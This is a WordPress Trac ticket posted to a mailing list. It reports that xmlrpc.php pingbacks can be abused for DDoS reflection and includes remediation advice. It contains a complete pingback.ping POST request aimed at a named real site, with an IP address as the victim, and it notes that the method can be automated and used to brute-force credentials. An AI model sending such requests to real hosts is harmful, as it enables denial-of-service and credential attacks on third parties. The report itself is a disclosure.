[wp-trac] [WordPress Trac] #50014: ping back vulnerability
WordPress Trac
noreply at wordpress.org
Sun Apr 26 19:34:56 UTC 2020
#50014: ping back vulnerability
--------------------------+-----------------------------
Reporter: jivanshu | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: XML-RPC | Version:
Severity: normal | Keywords:
Focuses: |
--------------------------+-----------------------------
https://blog.optimizely.com/ is wordpress site
Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can
be made as a part of a huge botnet causing a major DDOS. The website
https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
thus be potentially used for such an attack against other victim hosts.
In order to determine whether the xmlrpc.php file is enabled or not, using
the Repeater tab in Burp, send the request below. See screenshot
Notice that a successful response is received showing that the xmlrpc.php
file is enabled.
Now, considering the domain https://blog.optimizely.com/, the xmlrpc.php
file discussed above could potentially be abused to cause a DDOS attack
against a victim host. This is achieved by simply sending a request that
looks like below.
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 259
<methodCall>
<methodName> pingback.ping </methodName>
<params>
<param>
<value>
<string>https://216.58.221.46 </string>
</value>
</param>
<param>
<value>
<string>https://blog.optimizely.com/ </string>
</value>
</param>
</params>
</methodCall>
As soon as the above request is sent, the victim host
(https://216.58.221.46) gets an entry in its log file with a request
originating from the https://blog.optimizely.com// domain verifying the
pingback.
remediation:
If the XMLRPC.php file is not being used, it should be disabled and
removed completely to avoid any potential risks. Otherwise, it should at
the very least be blocked from external access.
thanks
note: screenshots are given below
Impact
This can be automated from multiple hosts and be used to cause a mass DDOS
attack on the victim.
this method is also used for brute force attacks to stealing the admin
credentials and other important credentials
--
Ticket URL: <https://core.trac.wordpress.org/ticket/50014>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list